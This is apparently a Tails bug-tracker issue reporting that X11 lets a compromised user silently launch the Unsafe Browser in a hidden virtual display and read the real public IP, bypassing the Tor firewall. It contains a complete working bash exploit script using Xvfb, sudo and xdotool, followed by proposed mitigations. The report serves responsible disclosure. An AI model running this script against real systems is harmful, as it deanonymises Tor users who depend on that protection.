The Unsafe Browser allows to retrieve the public IP address by a compromised amnesia user with no user interaction

The X11 protocol has long been known to not provide isolation between windows. Here I will show that it can be abused to bypass the firewall without any user interaction or visible side-effects by abusing the Unsafe Browser. I also provide mitigations while waiting for the switch to Wayland.

The existence of the clearnet user and the sudoers whitelist[1] for the Unsafe Browser makes it possible to reliably bypass the firewall by abusing the X11 protocol. Previously, I’ve seen doubts that this can be done surreptitiously and claims that it would necessarily require that the users see the browser pop up and the mouse be moved without their control. I have written a simple PoC (proof of concept) exploit which bypasses the firewall to show that is untrue:

#!/bin/bash

export DISPLAY=:69
mv /run/user/1000/bus{,.bak}

Xvfb $DISPLAY -r -nocursor & xpid=$!
sleep 1

sudo DISPLAY=$DISPLAY unsafe-browser &>/dev/null &

xdotool search --sync --name zenity 1>/dev/null
xdotool key --delay 200 Tab Return

xdotool search --sync --name Unsafe 1>/dev/null
xdotool key --delay 200 ctrl+l
xdotool type --delay 200 www.yourip.us
xdotool key --delay 200 Return

xdotool search --sync --name Your getwindowname | awk '{print $5}'

mv /run/user/1000/bus{.bak,}
kill "$xpid"
exit 0

The Unsafe Browser, or more specifically the clearnet user, should not be enabled and functional by default. Whenever it is not needed, the clearnet user should be locked, and the Unsafe Browser should either throw an error on access or not even be displayed. I can think of three mitigations:

Disable the browser by default, requiring it to be explicitly enabled in the splash screen.
Disable the browser as soon as Tor successfully connects, which would indicate no captive portal.
Attempt captive portal detection[2] to detect request rewrites and enable the Unsafe Browser only then.

I am marking this as a bug because this PoC clearly shows that the Unsafe Browser violates the security principles in the specified design documents[3]. Until the switch to Wayland is completed (and perhaps even then), the existence of the clearnet user should be considered incompatible with anonymous Tor usage. I am currently working on another exploit which bypasses the browser AppArmor profile without user interaction in order for this to be possible from within the context of a compromised browser as well. If I have the time, I will finish it up and report it as well.

[1]: https://git-tails.immerda.ch/tails/plain/config/chroot_local-includes/etc/sudoers.d/zzz_unsafe-browser
[2]: https://www.chromium.org/chromium-os/chromiumos-design-docs/network-portal-detection
[3]: https://tails.boum.org/contribute/design/Unsafe_Browser/

:sajolida: is watching this ticket.

Parent Task: #7072

Related issues

Related to #5785
Related to #10491
Related to #12213
Related to #17085
Related to #17134
Blocks #16209

Original created by @cypherpunks on 15635 (Redmine)

To upload designs, you'll need to enable LFS and have an admin enable hashed storage. More information